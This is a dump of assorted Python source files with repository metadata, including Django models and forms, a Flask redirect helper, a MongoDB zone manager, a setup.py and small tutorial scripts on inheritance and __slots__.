88bd31ecc6bd237466ec96a185b1d943f4ead144
|
2d060eb9c7126b8963adcad857daa6e39c6ac75f
|
/Resist.py
|
12e4f998383248c49443c1a4b9fc74c578754390
|
[] |
no_license
|
easy-rpg/Filler
|
43ce36980156f4ffd9597d822e9fa6c19105d892
|
55cddbbb21ac508f64b98ceedbc30c680d4c4951
|
refs/heads/master
| 2020-03-15T01:38:51.069870 | 2016-09-03T07:12:55 | 2016-09-03T07:12:55 | 131,898,370 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 560 |
py
|
import abc
class Resist_Boa(object):
"""docstring for """
__metaclass__ = abc.ABCMeta
valores = [2, 3, 3, 4, 4, 5, 5, 6, 6, 7, 7, 8, 8, 9, 9, 10, 10, 11, 11, 12]
@abc.abstractmethod
def __str__(self):
raise NotImplementedError('users must define __str__ to use this base class')
class Resist_Ruim(object):
"""docstring for """
__metaclass__ = abc.ABCMeta
valores = [0, 0, 1, 1, 1, 2, 2, 2, 3, 3, 3, 4, 4, 4, 5, 5, 5, 6, 6, 6]
@abc.abstractmethod
def __str__(self):
raise NotImplementedError('users must define __str__ to use this base class')
|
[
"[email protected]"
] | |
1c29302c75eba77721ac08ae1689249996414741
|
5864e86954a221d52d4fa83a607c71bacf201c5a
|
/eve/client/script/ui/station/fitting/stanceSlot.py
|
4f84e19f8e8023622408b00954931ab6ab6a422f
|
[] |
no_license
|
connoryang/1v1dec
|
e9a2303a01e5a26bf14159112b112be81a6560fd
|
404f2cebf13b311e754d45206008918881496370
|
refs/heads/master
| 2021-05-04T02:34:59.627529 | 2016-10-19T08:56:26 | 2016-10-19T08:56:26 | 71,334,417 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,646 |
py
|
#Embedded file name: e:\jenkins\workspace\client_SERENITY\branches\release\SERENITY\eve\client\script\ui\station\fitting\stanceSlot.py
from carbonui.primitives.container import Container
from eve.client.script.ui.inflight import shipstance
import carbonui.const as uiconst
class StanceSlots(Container):
def __init__(self, **kw):
super(StanceSlots, self).__init__(**kw)
def _GetAngles(self):
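        # Angles (in degrees) for up to three stance buttons, 10 degrees apart: 258, 248, 238.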
return [ 258 - i * 10 for i in xrange(3) ]
def ApplyAttributes(self, attributes):
Container.ApplyAttributes(self, attributes)
self.controller = attributes.controller
typeID = attributes.typeID
if typeID is None:
typeID = sm.GetService('invCache').GetInventoryFromId(attributes.shipID).GetItem().typeID
self.shipstances = []
for angle in self._GetAngles():
pos = attributes.angleToPos(angle)
newPos = (pos[0],
pos[1],
32,
32)
self.shipstances.append(shipstance.ShipStanceFittingButton(shipID=attributes.shipID, typeID=typeID, parent=self, pos=newPos, align=uiconst.TOPLEFT, controller=self.controller))
def ShowStances(self, shipID, typeID):
btnControllerClass = self.controller.GetStanceBtnControllerClass()
shipStanceButtonsArgs = btnControllerClass().get_ship_stance_buttons_args(typeID, shipID)
for idx, kwargs in enumerate(shipStanceButtonsArgs):
stanceButton = self.shipstances[idx]
stanceButton.SetAsStance(shipID, typeID, kwargs['stanceID'], kwargs['stance'])
def GetStanceContainers(self):
return self.shipstances
|
[
"[email protected]"
] | |
09da3887cf75a54b9d1965126cebae0ddf5f6475
|
6929f9696a8f90b3778d449a199cee8891f3f739
|
/python_core/deligating_to_parent_class_and_slots.py
|
c23b6fab9843575d3946b69e50da5f32471b0dc8
|
[] |
no_license
|
chemplife/Python
|
881d492a4271fb2b423f2dd611eaac53a0efdc34
|
7fdfbf442a915e4f41506503baad4345a52d1e86
|
refs/heads/master
| 2022-12-31T20:00:22.475985 | 2020-10-19T20:14:43 | 2020-10-19T20:14:43 | 305,503,403 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 6,720 |
py
|
'''
super().method()/attribute
-> Delegates things back to the parent class.
-> Use this only when the child has a method of the same name.. Python will anyway look up the hierarchy
   if it does not find the method in the Child-class.
Eg: class A:
        def b():
    class B(A):
        def c():
            return self.b() <- is the same as -> return super().b() <- because 'class B' does not have a 'def b()' of its own.
self: binds the instance of the object to the method anywhere in the hierarchy.
** if the 'Parent-Class' has an '__init__(self, name)' method that takes an argument and the 'Child-Class' does not define its own '__init__(self)':
-> a 'Child-Class' instance needs that argument (name) because __init__ is inherited from the 'Parent-Class'
   (a small sketch after the Person/Student demo below illustrates this)
'''
class Person:
def hello(self):
print('In Person Class: ', self)
class Student(Person):
def hello(self):
print('In Student Class: ', self)
super().hello()
p = Person()
s = Student()
p.hello()
print('\n')
# Looks at the address of 'self'.. it is the same in 'Person Class' as it is for 'Student Class'
s.hello()
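# A small sketch (not in the original file) of the note above: the child inherits
# the parent's __init__, so creating a child instance requires the 'name' argument.
class ParentWithArg:
    def __init__(self, name):
        self.name = name
class ChildNoInit(ParentWithArg):
    pass
c = ChildNoInit('Alex')  # 'name' is required here because __init__ is inherited
print(c.name)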
print('\n\n-------------------------------- Combined Example: Property/Inheritance/Delegate/Caching --------------------------------')
from math import pi
from numbers import Real
class Circle:
def __init__(self, r):
self.radius = r
self._area = None
self._perimeter = None
@property
def radius(self):
return self._r
@radius.setter
def radius(self, r):
if isinstance(r, Real) and r > 0:
self._r = r
self._area = None
self._perimeter = None
else:
raise ValueError('Radius must be a Positive Real Number.')
@property
def area(self):
if self._area is None:
self._area = pi * self.radius **2
return self._area
@property
def perimeter(self):
if self._perimeter is None:
self._perimeter = 2 * pi * self.radius
return self._perimeter
class UnitCircle(Circle):
def __init__(self):
super().__init__(1)
u = UnitCircle()
print('UnitCircle Radius:', u.radius)
print('UnitCircle Area:', u.area)
print('UnitCircle Perimeter:', u.perimeter)
#But this will work..
u.radius = 10
print('\nProblem: UnitCircle Radius:', u.radius)
# To make the Radius for Unit-Circle read-only..
class UnitCircle_1(Circle):
def __init__(self):
super().__init__(1)
@property
def radius(self):
        return super().radius  # 'return self.radius' here would re-enter this same property and recurse forever
# Now it will not work... even without setting u1.radius=10.. because 'self.radius = r' inside Circle.__init__() now hits a read-only property with no setter.
# ** we cannot call the 'radius.setter' from outside of the class.
# u1 = UnitCircle_1()
# u1.radius = 10
# print('\nProblem: UnitCircle_1 Radius:', u1.radius)
# To fix this, we make Circle.__init__() call a plain method (_set_radius) to set the radius instead of assigning through the property..
class Circle:
def __init__(self, r):
self._set_radius(r)
self._area = None
self._perimeter = None
@property
def radius(self):
return self._r
def _set_radius(self, r):
if isinstance(r, Real) and r > 0:
self._r = r
self._area = None
self._perimeter = None
else:
raise ValueError('Radius must be a Positive Real Number.')
@radius.setter
def radius(self, r):
self._set_radius(r)
@property
def area(self):
if self._area is None:
self._area = pi * self.radius **2
return self._area
@property
def perimeter(self):
if self._perimeter is None:
self._perimeter = 2 * pi * self.radius
return self._perimeter
class UnitCircle_1(Circle):
def __init__(self):
super().__init__(1)
@property
def radius(self):
return super().radius
u = UnitCircle_1()
print('\n')
print('UnitCircle Radius:', u.radius)
print('UnitCircle Area:', u.area)
print('UnitCircle Perimeter:', u.perimeter)
#Now this will not work..
# u.radius = 10
# print('\nProblem: UnitCircle Radius:', u.radius)
print('\n\n------------------------------------------- Slots -------------------------------------------\n')
'''
Classes inherently use a 'DICTIONARY' to store all the attributes.
But when we have a lot of instances of the class.. it creates a lot of memory overhead..
To do this in a more memory-efficient way.. SLOTS are used
Slots - a more compact data structure that Python provides.
We need to tell slots, in advance, which attributes we will have.
__slots__ = ('x', 'y')
('x', 'y') -> any iterable..
__slots__ -> tells Python: don't use the dictionary.. use slots..
Now, both of these will raise an error
-> obj.__dict__ : AttributeError
-> vars(obj) : TypeError
But -> dir(obj) : will still tell us about 'x' and 'y'
Slots V/S Dict
-> Slots are 'Memory-Efficient' : save about 10 times the memory compared to Dict.
-> Slots are 'Time-Efficient' : run about 30% faster than Dict.
-> Slots: cannot add attributes (monkey-patching) at runtime.. with Dict, we can add attributes on the fly..
'''
class Location:
__slots__ = 'name', '_longitude', '_latitude'
def __init__(self, name, *, longitude, latitude):
self._longitude = longitude
self._latitude = latitude
self.name = name
@property
def longitude(self):
return self._longitude
@property
def latitude(self):
return self._latitude
print('Location Dict: ', Location.__dict__)
Location.map_service = 'Google Maps'
print('\nLocation Dict after Attribute Addition: ', Location.__dict__)
#But we don't have Instance-Dictionary
l = Location('Delhi', longitude=100, latitude=72)
# print('\nLocation Instance Dict: ', l.__dict__)
print('\n\n--------------------------- Slots with Single Inheritance ---------------------------\n')
'''
-> 'Child-Class' will use the 'slots' FROM 'Parent-Class' if present. But 'Child-Class' will have its own '__dict__' to store attributes.
-> 'Child-Class' can have 'slots' even if 'Parent-Class' doesn't have them. 'Child-Class' will still have a '__dict__' to store attributes.
-> If the Child-Class also needs 'Slots', mention only those attributes that are NOT in the 'Parent-Class'.. Don't re-mention attributes.
-> If re-mentioned:
   -> Future Python updates may break it (it is marked for a 'check-on' in the future.)
   -> It hides the Parent attribute and can cause problems.
   -> It increases memory overhead due to the duplication..
************************
How to use both 'Slots' and '__dict__'?
-> __slots__ = 'attributes', .. , '__dict__'
-> Now, we can add more attributes during run-time.. (__dict__ is not dropped..)
-> Newly added attributes get stored in '__dict__' and not in 'slots'
   (a small sketch at the end of this file demonstrates this)
'''
class Person:
__slots__ = 'name'
class Student(Person):
pass
p = Person()
s = Student()
s.name = 'Alex'
print('Student Instance Dict: ', s.__dict__)
s.age = 18
print('\nStudent Instance Dict: ', s.__dict__)
# This will not work
#print('Person Instance Dict: ', p.__dict__)
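# A small sketch (not in the original file) of the 'slots + __dict__' combination
# described above: extra attributes can still be added at runtime.
class FlexibleLocation:
    __slots__ = 'name', '__dict__'
loc = FlexibleLocation()
loc.name = 'Delhi'        # stored in the slot
loc.country = 'India'     # monkey-patched at runtime, stored in __dict__
print('FlexibleLocation Instance Dict: ', loc.__dict__)  # {'country': 'India'}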
|
[
"[email protected]"
] | |
d022d56454d570a5b887704c79d4d2843271f345
|
576cc83449e10fd3f98281970c46016ea7a5aea2
|
/OpenCV拟合与特征点识别/模板匹配角度.py
|
78abfbc17a54a507b14bd408976b16d378badf18
|
[] |
no_license
|
HotView/PycharmProjects
|
215ab9edd341e3293daebcf86d97537f8cd28d75
|
61393fe5ba781a8c1216a5cbe7e0d06149a10190
|
refs/heads/master
| 2020-06-02T07:41:53.608742 | 2019-11-13T08:31:57 | 2019-11-13T08:31:57 | 191,085,178 | 3 | 2 | null | null | null | null |
UTF-8
|
Python
| false | false | 171 |
py
|
import math
a = math.atan(2/3)
c = math.atan(1)
print(c*180/math.pi)
print(a*180/math.pi)
#theta1 =math.tanh((a))
#print(theta1)
b = math.atan(6/2)
print(b*180/math.pi)
|
[
"[email protected]"
] | |
cce1e5cc0fba01f33051132e3981e03cec379801
|
a070182e6443995031340802e74d1e65a85bdca3
|
/bluelog/utils.py
|
4975d944d9c5eebe4486d47ab3fea78ee7fa681c
|
[] |
no_license
|
huazhicai/bluelog
|
f86a042a5f3ada46515920c45a0b1452a40d4ad9
|
c2a46ac25cbba4ecf7d4e0985ef9010ddae34c01
|
refs/heads/master
| 2020-04-04T16:33:27.910658 | 2019-01-03T09:59:52 | 2019-01-03T09:59:52 | 156,082,797 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 670 |
py
|
try:
from urlparse import urlparse, urljoin
except ImportError:
from urllib.parse import urlparse, urljoin
from flask import request, redirect, url_for
def is_safe_url(target):
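    # Guard against open redirects: only allow http(s) URLs pointing at this site's own host.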
ref_url = urlparse(request.host_url)
test_url = urlparse(urljoin(request.host_url, target))
return test_url.scheme in ('http', 'https') and ref_url.netloc == test_url.netloc
def redirect_back(default='blog.index', **kwargs):
for target in request.args.get('next'), request.referrer:
if not target:
continue
if is_safe_url(target):
return redirect(target)
return redirect(url_for(default, **kwargs))
|
[
"[email protected]"
] | |
d69a39808d6f68572bc01c15f5e876462397f0eb
|
4dac40a30e7bbb86ab829fed0cb6f12ff7fa0216
|
/djwiki/wiki/models.py
|
0e7d732c83f68d3e3e9fb72063d8346168ff24ae
|
[] |
no_license
|
gzpgg3x/pythonDiary
|
cc039b716c810f99d5a12b0f4167a711cd6ea18f
|
0c3af53dc635d5ff40adad89dce146d6684e162e
|
refs/heads/master
| 2021-01-10T19:55:41.130511 | 2013-04-21T04:37:10 | 2013-04-21T04:37:10 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 201 |
py
|
from django.db import models
class Page(models.Model):
name = models.CharField(max_length=40, unique=True)
content = models.TextField()
def __unicode__(self):
return self.name
|
[
"[email protected]"
] | |
26952bdc611861509bd368811c1b243e394f7d45
|
a32049cdf8cb3403e8e54ddd661f8bb506cca99b
|
/first_project/first_app/urls.py
|
f627fd5ffdf7c929f3138c22f3c628b8dc0cf27b
|
[] |
no_license
|
akhileshvvn/django-deployment-example
|
5a3beb8205f2905c99808e983baaf0f8a7a23772
|
45317bb6166527054541e52c8a986f44342ea958
|
refs/heads/master
| 2022-04-15T08:17:02.615307 | 2020-04-11T07:54:19 | 2020-04-11T07:54:19 | 254,815,719 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 501 |
py
|
from django.urls import path,re_path
from django.conf.urls import url
from . import views
#TEMPLATE TAGGING
app_name = 'first_app'
urlpatterns = [
re_path(r'^index/', views.index, name=''),
re_path(r'formindex/',views.form_name_view,name='form_name'),
re_path(r'^relative/$',views.relative,name = 'relative'),
re_path(r'^other/$',views.other,name='other'),
re_path(r'^register/$',views.register,name='register'),
re_path(r'^user_login/$',views.user_login,name='user_login')
]
|
[
"[email protected]"
] | |
7e5fc8246ba12f67b9efe8fe1433a80bbd6460fe
|
d4fe66ef7b5bc1745aeb4054b30575fb25a053f4
|
/setup.py
|
d838e226a7de7b9cd782061fb6f64b3134bc06cc
|
[
"Apache-2.0"
] |
permissive
|
jay-johnson/antinex-client
|
796c753bc9df8498f25dca994920b26d8828a940
|
76a3cfbe8a8d174d87aba37de3d8acaf8c4864ba
|
refs/heads/master
| 2021-04-15T15:55:39.670061 | 2020-09-04T19:49:15 | 2020-09-04T19:49:15 | 126,577,469 | 6 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,053 |
py
|
import os
import sys
import warnings
import unittest
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
from setuptools.command.test import test as TestCommand
class PyTest(TestCommand):
user_options = [('pytest-args=', 'a', "Arguments to pass to pytest")]
def initialize_options(self):
TestCommand.initialize_options(self)
self.pytest_args = ''
def run_tests(self):
import shlex
# import here, cause outside the eggs aren't loaded
import pytest
errno = pytest.main(shlex.split(self.pytest_args))
sys.exit(errno)
"""
https://packaging.python.org/guides/making-a-pypi-friendly-readme/
check the README.rst works on pypi as the
long_description with:
twine check dist/*
"""
long_description = open('README.rst').read()
cur_path, cur_script = os.path.split(sys.argv[0])
os.chdir(os.path.abspath(cur_path))
install_requires = [
"colorlog",
"coverage",
"flake8",
"matplotlib",
"numpy",
"pandas",
"pep8",
"pipenv",
"pycodestyle",
"pylint",
"recommonmark",
"requests",
"seaborn",
"sphinx",
"sphinx-autobuild",
"sphinx_rtd_theme",
"spylunking",
"tox",
"tqdm",
"unittest2",
"mock"
]
if sys.version_info < (3, 5):
warnings.warn(
"Less than Python 3.5 is not supported.",
DeprecationWarning)
# Do not import antinex_client module here, since deps may not be installed
sys.path.insert(0, os.path.join(os.path.dirname(__file__), "antinex_client"))
setup(
name="antinex-client",
cmdclass={"test": PyTest},
version="1.3.6",
description=("AntiNex Python client"),
long_description_content_type='text/x-rst',
long_description=long_description,
author="Jay Johnson",
author_email="[email protected]",
url="https://github.com/jay-johnson/antinex-client",
packages=[
"antinex_client",
"antinex_client.scripts",
"antinex_client.log"
],
package_data={},
install_requires=install_requires,
test_suite="setup.antinex_client_test_suite",
tests_require=[
"pytest"
],
scripts=[
"./antinex_client/scripts/ai",
"./antinex_client/scripts/ai_env_predict.py",
"./antinex_client/scripts/ai_get_prepared_dataset.py",
"./antinex_client/scripts/ai_get_job.py",
"./antinex_client/scripts/ai_get_results.py",
"./antinex_client/scripts/ai_prepare_dataset.py",
"./antinex_client/scripts/ai_train_dnn.py"
],
use_2to3=True,
classifiers=[
"Development Status :: 5 - Production/Stable",
"Intended Audience :: Developers",
"License :: OSI Approved :: Apache Software License",
"Operating System :: OS Independent",
"Programming Language :: Python :: 3.5",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: Implementation :: PyPy",
"Topic :: Software Development :: Libraries :: Python Modules",
])
|
[
"[email protected]"
] | |
63f124f199d2e152e2fc67618693c424f3febbb7
|
d458b72b4d0e5c51446bb8b9f8a6276015dfb594
|
/math/0x02-calculus/10-matisse.py
|
88cf330d9c797d23e8f981fda83e54f60879e7f5
|
[] |
no_license
|
mecomontes/Machine-Learning-projects
|
d6588cfaa7d020d3fae0fb74f6550c9e84500578
|
50e1828b58bb58eecfd3a142501b37fe701f4e49
|
refs/heads/main
| 2023-07-14T12:30:19.792332 | 2021-08-29T15:33:16 | 2021-08-29T15:33:16 | 376,129,791 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 808 |
py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Dec 8 9:34:16 2020
@author: Robinson Montes
"""
def poly_derivative(poly):
"""
    Function that finds the derivative of a polynomial
    Arguments:
    - poly (list of integers): polynomial to calculate the derivative of
Return:
List of coefficients representing the derivative of the polynomial
"""
if poly is None or poly == [] or type(poly) is not list:
return None
derivate = []
i = 0
while i < len(poly):
if type(poly[i]) not in (int, float):
return None
elif len(poly) == 1:
derivate.append(0)
else:
if i == 0:
i += 1
continue
derivate.append(poly[i]*i)
i += 1
return derivate
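# Quick usage sketch (not part of the original exercise file):
# f(x) = 5 + 3x + x^3  ->  f'(x) = 3 + 3x^2
if __name__ == '__main__':
    print(poly_derivative([5, 3, 0, 1]))  # [3, 0, 3]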
|
[
"[email protected]"
] | |
b49d41c660d323470c0b91f8b0625757281eccd0
|
1be96ee96f3b33469ca073c4f32884cb7230106b
|
/python3_cron_scripts/libs3/ZoneManager.py
|
0531dbedb4a08f885bbf76e4b6fa355e672c65fc
|
[
"Apache-2.0"
] |
permissive
|
vishnurajkv/Marinus
|
3305478038fba8b0ea15dafa2219df9f4df21e9b
|
331ba1dc2e99ae99df6c9d93063a852eec41d578
|
refs/heads/master
| 2020-06-29T10:58:50.196807 | 2019-07-26T20:48:47 | 2019-07-26T20:48:47 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 7,583 |
py
|
#!/usr/bin/python3
# Copyright 2018 Adobe. All rights reserved.
# This file is licensed to you under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License. You may obtain a copy
# of the License at http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software distributed under
# the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR REPRESENTATIONS
# OF ANY KIND, either express or implied. See the License for the specific language
# governing permissions and limitations under the License.
"""
This class mostly exists because almost every script needs to do a get_distinct_zones
Having it centralized means that the included and excluded statuses can be managed in one place.
"""
from pymongo import MongoClient
from datetime import datetime
from tld import get_fld
class ZoneManager(object):
# A status of confirmed typically means it was entered by a human
CONFIRMED = "confirmed"
# A status of unconfirmed means that it was added via automation
# It has not been revied by a human
UNCONFIRMED = "unconfirmed"
# A status of false positive means that a human identified that automation made a mistake
FALSE_POSITIVE = "false_positive"
# A status of expired means that the automation believes that the domain is no longer registered
EXPIRED = "expired"
# The MongoConnector
mongo_connector = None
# The zone collection
zone_collection = None
def __init__(self, mongo_connector):
"""
Initialize the MongoDB Connector
"""
self.mongo_connector = mongo_connector
self.zone_collection = mongo_connector.get_zone_connection()
def _check_valid_status(self, status):
if status != ZoneManager.EXPIRED and status != ZoneManager.FALSE_POSITIVE and \
                status != ZoneManager.CONFIRMED and status != ZoneManager.UNCONFIRMED:
print("ERROR: Bad status value")
return False
return True
@staticmethod
def get_distinct_zones(mongo_connector, includeAll = False):
"""
This is the most common usage of get zones where the caller wants just the list of
active zones.
This returns the list of zones as an array of strings rather than the complete JSON objects
"""
zones_collection = mongo_connector.get_zone_connection()
if includeAll:
zone_results = mongo_connector.perform_distinct(zones_collection, 'zone')
else:
zone_results = mongo_connector.perform_distinct(zones_collection, 'zone', {'status': {"$nin": [ZoneManager.FALSE_POSITIVE, ZoneManager.EXPIRED]}})
zones = []
for zone in zone_results:
if zone.find(".") >= 0:
zones.append(zone)
return zones
@staticmethod
def get_reversed_zones(mongo_connector):
"""
Retrieve the list of active zones and then reverse them to match the Common Crawl format
"""
zones_collection = mongo_connector.get_zone_connection()
zone_results = mongo_connector.perform_distinct(zones_collection, 'zone', {'status': {"$nin": [ZoneManager.FALSE_POSITIVE, ZoneManager.EXPIRED]}})
zones = []
for zone in zone_results:
if zone.find("."):
zone_parts = zone.split(".")
# The vertices.txt entries from common_crawl are in reverse order (e.g. org.example.www)
# To string match faster, the zones are stored in a reverse format prior to matching.
# This avoids having to reverse each entry in the file which is less efficient.
rev_zone = ""
for part in zone_parts:
rev_zone = part + "." + rev_zone
rev_zone = rev_zone[:-1]
zones.append(rev_zone)
return zones
@staticmethod
def get_zones_by_source(mongo_connector, source, includeAll=False):
"""
Returns a list of zones based on the provided reporting source
"""
zone_collection = mongo_connector.get_zone_connection()
if includeAll:
zones = mongo_connector.perform_distinct(zone_collection, 'zone', {
'reporting_sources.source': source})
else:
zones = mongo_connector.perform_distinct(zone_collection, 'zone', {
'reporting_sources.source': source,
'status': {'$nin': [ZoneManager.FALSE_POSITIVE, ZoneManager.EXPIRED]}})
return zones
@staticmethod
def get_zones(mongo_connector, includeAll=False):
"""
        This will return the full zone objects for all active zones.
This returns the complete json objects for the matching descriptions
"""
zones_collection = mongo_connector.get_zone_connection()
if includeAll:
zone_results = mongo_connector.perform_find(zones_collection, {})
else:
zone_results = mongo_connector.perform_find(zones_collection, {'status': {"$nin": [ZoneManager.FALSE_POSITIVE, ZoneManager.EXPIRED]}})
zones = []
for zone in zone_results:
if zone['zone'].find(".") >= 0:
zones.append(zone)
return zones
@staticmethod
def get_root_domain(value, zone=None):
"""
Get the root domain (FLD) for the provided value
"""
res = get_fld(value, fix_protocol=True, fail_silently=True)
if res is None:
return zone
return res
def get_zone(self, zone):
"""
Fetch the full individual zone record.
This is not a staticmethod since it would probably be called repeatedly.
"""
return self.mongo_connector.perform_find(self.zone_collection, {'zone': zone})
def get_zones_by_status(self, status):
"""
This returns the list of zones associated with the provided status.
This returns the list of zones as an array of strings rather than the complete JSON objects
"""
if not self._check_valid_status(status):
return
zone_results = self.mongo_connector.perform_distinct(self.zone_collection, 'zone', {'status': status})
zones = []
for zone in zone_results:
if zone.find(".") >= 0:
zones.append(zone)
return zones
def set_status(self, zone, status, caller):
"""
        Set a zone's status (confirmed, unconfirmed, false_positive, or expired).
"""
if self.zone_collection.find({'zone': zone}).count() == 0:
print("ERROR: Invalid zone!")
return
        if not self._check_valid_status(status):
            return
if caller is None or caller == "":
print("ERROR: Please provide a caller value!")
return
now = datetime.now()
note = caller + " set to " + status + " on " + str(now)
self.zone_collection.update({"zone": zone}, {"$set": {"status": status, "updated": now}, "$addToSet": {"notes": note}})
def add_note(self, zone, note):
"""
In the future, there should probably be restrictions on note length.
For now, it is not set until more information on usage is available.
"""
self.zone_collection.update({"zone": zone}, {"$addToSet": {"notes": note}})
|
[
"[email protected]"
] | |
33302759c219b9a3b1fe2347ecb502a4dace1d4d
|
fc0150b1fd6ba0efd6746a34ffa8cba01640d10e
|
/Programming Basics with Python - април 2018/04. Complex-Conditions/02. Small Shop.py
|
f98d0d795257e24d58dfce9db983b1cd9ca6dbeb
|
[] |
no_license
|
vgrozev/SofUni_Python_hmwrks
|
7554d90f93b83d58e386c92dac355573c8cda848
|
b10a941a0195ea069e698b319f293f5b4a660547
|
refs/heads/master
| 2021-06-08T19:40:27.009205 | 2019-11-24T17:19:31 | 2019-11-24T17:19:31 | 95,629,443 | 3 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,132 |
py
|
product = input().lower()
town = input().lower()
quantity = float(input())
total = 0.0
if town == 'sofia':
if product == 'coffee':
total = quantity * 0.50
elif product == 'peanuts':
total = quantity * 1.60
elif product == 'beer':
total = quantity * 1.20
elif product == 'water':
total = quantity * 0.80
else: # product == 'sweets'
total = quantity * 1.45
elif town == 'plovdiv':
if product == 'coffee':
total = quantity * 0.40
elif product == 'peanuts':
total = quantity * 1.50
elif product == 'beer':
total = quantity * 1.15
elif product == 'water':
total = quantity * 0.70
else: # product == 'sweets'
total = quantity * 1.30
else: # town == 'Varna'
if product == 'coffee':
total = quantity * 0.45
elif product == 'peanuts':
total = quantity * 1.55
elif product == 'beer':
total = quantity * 1.10
elif product == 'water':
total = quantity * 0.70
else: # product == 'sweets'
total = quantity * 1.35
print("{0:.2f}".format(total))
|
[
"[email protected]"
] | |
2d6e5705b0d6fc9452a7eef4f715005355db0acf
|
0067290f8a2c5c367eee2e76f7ec743719d5b59c
|
/one/two/migrations/0002_auto_20170802_1924.py
|
02ba77ac66799d0a3867254c03ad5115c12deb5d
|
[] |
no_license
|
8880/Django
|
d81da8f410845676606eb148a609f56792a14b1b
|
469fe07475c2f7c6e2d1ba1e2119b59550f154e6
|
refs/heads/master
| 2021-01-16T17:54:58.393384 | 2017-08-19T02:55:11 | 2017-08-19T02:55:11 | 100,019,134 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,264 |
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.3 on 2017-08-02 11:24
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('two', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Comment',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('content', models.TextField(verbose_name='\u8bc4\u8bba\u5185\u5bb9')),
('username', models.CharField(blank=True, max_length=30, null=True, verbose_name='\u7528\u6237\u540d')),
('email', models.EmailField(blank=True, max_length=50, null=True, verbose_name='\u90ae\u7bb1\u5730\u5740')),
('url', models.URLField(blank=True, max_length=100, null=True, verbose_name='\u4e2a\u4eba\u7f51\u9875\u5730\u5740')),
('date_publish', models.DateTimeField(auto_now_add=True, verbose_name='\u53d1\u5e03\u65f6\u95f4')),
],
options={
'verbose_name': '\u8bc4\u8bba',
'verbose_name_plural': '\u8bc4\u8bba',
},
),
migrations.AlterModelOptions(
name='article',
options={'ordering': ['-id'], 'verbose_name': '\u6587\u7ae0', 'verbose_name_plural': '\u6587\u7ae0'},
),
migrations.AddField(
model_name='comment',
name='article',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='two.Article', verbose_name='\u6587\u7ae0'),
),
migrations.AddField(
model_name='comment',
name='pid',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='two.Comment', verbose_name='\u7236\u7ea7\u8bc4\u8bba'),
),
migrations.AddField(
model_name='comment',
name='user',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL, verbose_name='\u7528\u6237'),
),
]
|
[
"klous530.outlook.com"
] |
klous530.outlook.com
|
a4e3c2a78a101ae2c35ecf31315de44d777b253f
|
89cd8b77ad5171c336cc60b2133fe6468a6cb53f
|
/Module01_CZ/day7_data_struct_str/04-代码/day7/125_字符串高级操作(判断型).py
|
8f356536eabd5e44cafbc8624e413494095895a0
|
[
"MIT"
] |
permissive
|
fenglihanxiao/Python
|
75178f6b6b0c53345e1ed54226ea645216572d6c
|
872baf3a3a5ee42740161152605ca2b1ddf4cd30
|
refs/heads/master
| 2021-05-23T18:49:20.656433 | 2020-04-29T01:06:21 | 2020-04-29T01:06:21 | 253,199,073 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 272 |
py
|
"""
演示字符串判断型操作
"""
# str1 = "\n"
# print(str1.islower())
# print(str1.isupper())
name = "张三丰"
print(name.startswith("张三"))
filename="1.jpge"
if filename.endswith(".jpg") or filename.endswith(".png") :
print("该文件是一个图片")
|
[
"[email protected]"
] | |
a268ef38a2861b114ef4f65c5e31730ade40cc92
|
7f68bbb3fd328a4d6bbabecb44305987d8cbbfc4
|
/django/django-intro/home/workspace/PROJECT8/movies/forms.py
|
96b211b33850d9d51473be7e05a26ff57cb8c511
|
[] |
no_license
|
seunghoon2334/TIL
|
c84f9f9e68c8ccc7a1625222fe61f40739774730
|
51cfbad2d9b80a37b359716fca561c2a5c5b48b3
|
refs/heads/master
| 2022-12-18T18:20:19.210587 | 2019-11-26T03:14:23 | 2019-11-26T03:14:23 | 162,101,369 | 0 | 0 | null | 2022-11-22T03:59:16 | 2018-12-17T08:51:53 |
C
|
UTF-8
|
Python
| false | false | 491 |
py
|
from django import forms
from crispy_forms.helper import FormHelper
from crispy_forms.layout import Submit
from .models import Movie
# modelform
class MovieForm(forms.ModelForm):
class Meta:
model = Movie
fields = '__all__'
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.helper = FormHelper()
self.helper.form_method = 'POST'
        self.helper.add_input(Submit('Submit', 'Submit!'))  # label translated from Korean '제출!'
|
[
"[email protected]"
] | |
5837d24747eb111593c4fdc4fdb16c2048efb91e
|
d3e6d6555b0314936902727af36de2f1b7432bf8
|
/linked-list-cycle/linked-list-cycle.py
|
af4d1032682c25c061b7019097dc1288fceab653
|
[] |
no_license
|
fly2rain/LeetCode
|
624b1e06e1aa3174dfb5c81834b58cc8fd7ad073
|
4ddb5a051c6e2051f016a675fd2f5d566c800c2a
|
refs/heads/master
